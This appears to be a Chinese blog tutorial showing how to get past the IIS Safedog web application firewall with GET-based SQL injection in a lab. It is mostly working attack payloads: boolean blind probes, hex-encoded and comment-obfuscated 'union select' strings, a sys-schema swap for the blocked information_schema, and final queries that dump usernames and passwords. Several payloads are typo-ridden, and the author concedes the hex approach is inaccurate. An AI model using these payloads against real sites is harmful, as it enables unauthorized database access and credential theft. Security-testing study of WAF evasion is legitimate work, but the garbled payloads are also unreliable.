iis某狗注入绕过(get)
首先呢服务器上安装的是一个最新版的iis安全狗
UUUUUUUUUUUUUUUUUUUU
这里将防护等级也设置成高级
部署好我们的靶场
首先用布尔注入的方式尝试绕过第一个整型注入
将我们的靶场整型注入改成get的提交方式
成功修改为get了
首先一如即让,探测一下是否存在注入
因为是get注入所以我们可以直接构造
and 1=1
显然行不通啊,那咱换个方式
这里我们用id=\Nor+0x30=0x30
可以明显判断出这里是存在注入的
接下来构造语法获取当前数据库版本
先使用常规的试试
ascii(substr(version(),2,1)=100)
显然也是不行,这里可以来判断一下是哪个字符被拦截了
就挺尴尬,and被拦截了
尝试绕过
ascii(substr(@@version,2,1))<70
成功得到回显
接下来想办法拿到数据库名
常规的database()肯定是不行,盲猜这里做了屏蔽
结果也很明显
更正语法,将被过滤的database()转换成hex成功绕过(此处修改一下,hex结果不准确,建议用下面union的绕过方式更正
接下来就更简单了,跑包都呗?扔到burp一跑就能出结果
md布尔盲注太痛苦了,就不演示接下来的操作了,各位自行脑补
此处水100字
到这里,可以看到能成功获取密码
okk结束~(做的时候没截屏,懒得再做一遍哈哈哈)
又来吧,这次是字符型的布尔!
痛苦面具再次戴上
一波测试下来
万能公式
and 0x30!=0x30(比较符不能更改替换值得到结果)
接下来构造语句,vince’ and 0x30!=if(substr(@@version from for)=5),0x31,0x30)
这句不用我解释了吧,很简单的
不成立效果
如果看不懂from+1+for+1是个啥玩意的话
用你熟悉的也行,这里科普一下为啥鄙人要用稍微麻烦点的姿势
部分waf会拦截逗号,所以这里为了‘不必要的麻烦’就用了这么一种绕过的姿势,但显然,某狗不拦截逗号
所以后面的玩意儿咱就不做了吧~
算了,还是稍微演示一下别又说我水帖
首先这个姿势肯定不行,waf拦截了关键词
还是那个办法,转成hex试试(这个位置也是,更正一下使用,用union的方法,hex不准确)
姿势到位,ok往后咱就不做了,别说我水,确实麻烦
接下来就是union的绕过了
这次尽量不水哈哈哈
还是先从整型开始吧
探测没啥好说,不理解的自己往上翻翻
这个位置order by是被拦截的
我们可以构造一些乱七八糟的语法比如
这样他就不拦截了
(order by 测出只有俩列)
ok上戏
构造union语法,这个会呗不用教呗
但是,order by 都会被拦截,union select不用想直接死
这里可以试试上面吧的绕过方式
成功绕过
到这里,可以看下图,发现带入查询的话,会被拦截,但是问题不大,它拦截,咱就绕过呗
有点曲折但成功绕过
ok往下继续构造
union select 1, group_concat(table.name from information_schema.tables where table.schema=database())
1+union/*//--//*/select+1,table.name+from+information_schema.tables+where+table.schema=database/*!77777777777777777777777777777777777777afafdfdaddddddddddddddddd*/())
依旧被拦截,这里拆开看一下,发现是informatin_schema.tables被拦截了,试过从中间隔断发现效果并不理想
查询了一点资料(姿势储备不足)
悟到一个小姿势点,既然information_schema被过滤,那咱可以换一个呀不用去想着绕过撒
mysql5.7+的版本新增了sys schema
这里知道了语法便重新构造语法
group_concat(table_name) from sys.schema_auto_increment_columns where table_schema=database()--+
这里拿到 表,开始往下构造
直接到最后一步
获取账号密码
union/*//--//*/select+1,oup_concat(username,password)from `users`+limit+1
接下来是字符型的union
上面操作不再演示了,直接到最后一步
vince'+union/*//--//*/select+1,group_concat(username,password)+from+`users`+limit+2--+
语法大差不差,最后一步确实不难,难的是中间
post的后面再做演示
iis某狗注入绕过(get)相关推荐
- SQL注入绕过安全狗
SQL注入绕过安全狗 前期知识 黑名单 演示开始 内联注释绕过 模糊查询绕过 查询数据库用户名和表信息 前期知识 网站安全狗是一款集网站内容安全防护.网站资源保护及网站流量保护功能为一体的服务器工具, ...
- 绕安全狗mysql_Mysql注入绕过安全狗
Mysql注入绕过安全狗 sql注入闭合检查 sql注入的分类有很多种分法:可以分成数字型和字符型,区别在于是否需要完整闭合.本题中由于我经验不足,试了好久才想到就是简单的双引号加括号就可以闭合了,然 ...
- 实战sql注入绕过安全狗
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ ...
- 安全狗SQL注入绕过
安全狗SQL注入绕过 本文用sqli-labs第一关为例 一.简单注入 开启安全狗后尝试正常注入,发送请求后可以看到被安全狗拦截了 1' and 1=1 %23 寻找被安全狗匹配的特征字符,这里没被拦 ...
- 黑客常用SQL注入绕过技术总结!
今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞,使我们的系统更加健壮, ...
- 黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
大家好,我是冰河~~ 今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞, ...
- ctfshow-WEB-web10( with rollup注入绕过)
ctf.show WEB模块第10关是一个SQL注入漏洞, 点击取消按钮可以获取源码, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字 ...
- SQL注入绕过(passby)策略
SQL注入绕过技巧 空格绕过 注释符/* */,%a0,%0a 括号绕过空格 select(user())from dual where(1=1)and(2=2) 引号绕过 采用16进制编码绕过,例如 ...
- sql注入绕过姿势--骚姿势大全
项目地址 https://github.com/Junehck/SQL-injection-bypass 项目介绍 记录实战中的各种sql注入绕过姿势, 文章并不是完整的仅提取出byapss部分, 如 ...
最新文章
- python数据分析——世界杯分析预测
- linux bridge搭建虚拟机全过程
- Docker容器的文件系统管理
- java (三)面向对象编程
- [Android实例] 同一Activity的实例被多次重复创建
- Abp v2.8.0发布 路线图
- JavaWeb中filter的详解及应用案例
- Python 学习入门(22)—— 线程同步
- 算法笔记-------快速排序
- python的raw_对于Python中RawString的理解(引用)
- 软件工程 可行性分析与需求分析
- NNDL 实验六 卷积神经网络(4) ResNet18实现MINIST
- 解决报错Duplicate keys detected
- Windows10 LTSB/LTSC版安装应用商店与UWP
- 谷歌想要返华,但却陷入了尴尬境地
- AES - Openssl AES 函数说明
- 什么是PCB走线的3W原则
- jeb 内存溢出解决方案
- VM中centos中设置共享文件夹
- Apache Kafka 入门 - Kafka命令详细介绍